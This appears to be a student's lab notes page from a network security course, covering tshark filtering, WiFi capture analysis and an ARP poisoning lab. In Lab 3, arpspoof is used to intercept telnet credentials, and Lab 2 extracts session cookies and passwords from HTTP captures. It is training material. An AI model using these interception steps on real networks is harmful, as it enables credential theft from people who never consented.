🔬Tshark, ARP, WiFi
Lab 1
Tshark usage
tshark -vTShark (Wireshark) 2.6.1 (Git v2.6.1 packaged as 2.6.1-0ubuntu2~16.04.0)📌 Running Tshark version is
2.6.1
tshark -DThese are all supported network interfaces for monitoring
Sniff some traffic on
eth0
tshark -i eth0
📌
studentuser don't have permission to capture oneth0interface
Display the packet list of the
.pcapfile
tshark -r HTTP_traffic.pcapCount
.pcapfile number of lines to find total number of packets
tshark -r HTTP_traffic.pcap | wc -l
30418 # lines in the file
Read first 100 packets from the
.pcapfile
tshark -r HTTP_traffic.pcap -c 100List the Protocol Hierarchy Statistics from the
.pcapfile
tshark -r HTTP_traffic.pcap -z io,phs -q
Lab 2
Tshark usage and filtering
Filtering
Show the
HTTPtraffic from a.pcapfile
tshark -r HTTP_traffic.pcap -Y 'http'
tshark -r HTTP_traffic.pcap -Y 'http' | more
Show only the IP packets sent from IP address
192.168.252.128to IP address52.32.74.91
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && ip.dst==52.32.74.91"
Print only packets containing GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET"
Print only packets with frame time, source IP and URL for all GET requests
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET" -Tfields -e frame.time -e ip.src -e http.request.full_uri
Print packets containing a string
tshark -r HTTP_traffic.pcap -Y "http contains password"
📌
4HTTP packets contain thepasswordstring
Check the destination IP for
GETrequests sent towww.nytimes.com
tshark -r HTTP_traffic.pcap -Y "http.request.method==GET && http.host==www.nytimes.com" -Tfields -e ip.dst
📌
170.149.159.130is the destination IP ofwww.nytimes.com
Check the session ID used by
192.168.252.128foramazon.in
tshark -r HTTP_traffic.pcap -Y "ip contains amazon.in && ip.src==192.168.252.128" -Tfields -e ip.src -e http.cookie
📌
278-7381968-4337153is the session ID
Find the OS type on the machine with IP
192.168.252.128
tshark -r HTTP_traffic.pcap -Y "ip.src==192.168.252.128 && http" -Tfields -e http.user_agent
Use the
User_agentstring to find the specific distribution
Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0
📌 The OS is
Linux x86_64; rv:31.0- user-agents.net
Lab 3 - ARP Poisoning
🔬 INE Platform Lab
ARP Poisoning attack to a
telnetserver
the client machine authenticates with the
telnetserver every 30secFind the
telnetlogin credentialsTools:
arpspoof&Wireshark
Monitor the traffic on
eth1interface of the Kali Attacker machine.
ip -br -c a
eth1 UP 10.100.13.140/24Enumeration
nmap 10.100.13.0/24Nmap scan report for 10.100.13.1
22/tcp open ssh
3389/tcp open ms-wbt-server
# ^^ Gateway machine, do not attack
Nmap scan report for 10.100.13.36
22/tcp open ssh
23/tcp open telnet
# ^^ Telnet server machine
Nmap scan report for 10.100.13.140
3389/tcp open ms-wbt-server
5910/tcp open cm
# ^^ Client machine
ARP Poisoning Attack
To see traffic of other machines, configure Kali Attacker VM to forward IP packets
echo 1 > /proc/sys/net/ipv4/ip_forwardStart the ARP poisoning attack with the
arpspooftool
arpspoof -i eth1 -t 10.100.13.37 -r 10.100.13.36
# -t = target
# -r = hostOpen
Wiresharkand start captureeth1trafficApply
telnetfilter
Follow the TCP stream and find the
telnetcredentialsStop the capture and the
arpspooftool
📌
Telnetcredentials areadmin:MyS3cr3tP455
telnet 10.100.13.36
Lab 4 - WiFi Traffic Analysis
🔬 WiFi Security: Traffic Analysis I
WiFi basic traffic analysis with
Wireshark
Find the name of the Open SSID in the packet dump, using the filter
Beacon frame =
0x0008Wlan tag
48= RSN-IE (Robust Security Network Information Element)
(wlan.fc.type_subtype == 0x0008) && (!(wlan.wfa.ie.wpa.version == 1)) &&
!(wlan.tag.number == 48)
Find the channel
Home_Networkis operating
wlan contains Home_Network
Find which security mechanism has
LazyArtistsSSID
wlan contains LazyArtists
Check the WPS setup for
Amazon WoodSSID
(wlan.ssid contains "Amazon") && (wlan.fc.type_subtype == 0x0008)📌 WPS is enabled
Count the packets of the device with MAC
e8:de:27:16:87:18wlan.ta = transmitted
wlan.ra = received
(wlan.ta == e8:de:27:16:87:18) || (wlan.ra == e8:de:27:16:87:18)
Find a specific MAC address which exchange data with
SecurityTube_OpenSSIDSecurityTube_Openis hosted on BSSIDe8:de:27:16:87:18
(wlan.bssid == e8:de:27:16:87:18) && (wlan.fc.type_subtype == 0x0020)
Find TSF timestamp of the Association Response sent from the
SecurityTube_Openaccess point to a station
((wlan.bssid == e8:de:27:16:87:18) && (wlan.addr==5c:51:88:31:a0:3b)) &&
(wlan.fc.type_subtype == 0x0001)
Lab 5 - WiFi Traffic Filtering
Tshark usage and filtering
Show only WiFi traffic
tshark -r WiFi_traffic.pcap -Y "wlan"
Show only the deauthentication packets
Every management frame in WiFi has can be classified under a type and subtype
wlan.fc.type_subtype == 0x000c- AP sends deauthentication frames
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c"
Show only the
WPA handshakepacketsEAPoL (Extensible Authentication Protocol over LAN) is used for WPA handshake
tshark -r WiFi_traffic.pcap -Y "eapol"
Show only SSID and BSSID values of all beacon frames
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==8" -Tfields -e wlan.ssid -e wlan.bssid
Check the BSSID of
LazyArtistsSSID
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==LazyArtists" -Tfields -e wlan.bssid
📌
LazyArtistsBSSID isfc:b0:c4:91:71:e0.
Show the channel on which
Home_Networkoperates
tshark -r WiFi_traffic.pcap -Y "wlan.ssid==Home_Network" -Tfields -e wlan_radio.channel
📌
Home_Networkoperating channel is6.
Show the two devices that received the deauth messages
tshark -r WiFi_traffic.pcap -Y "wlan.fc.type_subtype==0x000c" -Tfields -e wlan.ra
📌 The MAC address of the two devices are
6c:19:8f:5f:81:74andbc:ae:c5:c3:5e:01.
Check vendor and model of the device with MAC
5c:51:88:31:a0:3b
tshark -r WiFi_traffic.pcap -Y "wlan.ta==5c:51:88:31:a0:3b && http" -Tfields -e http.user_agent
📌 The device is a Motorola MotoG3.
Last updated
Was this helpful?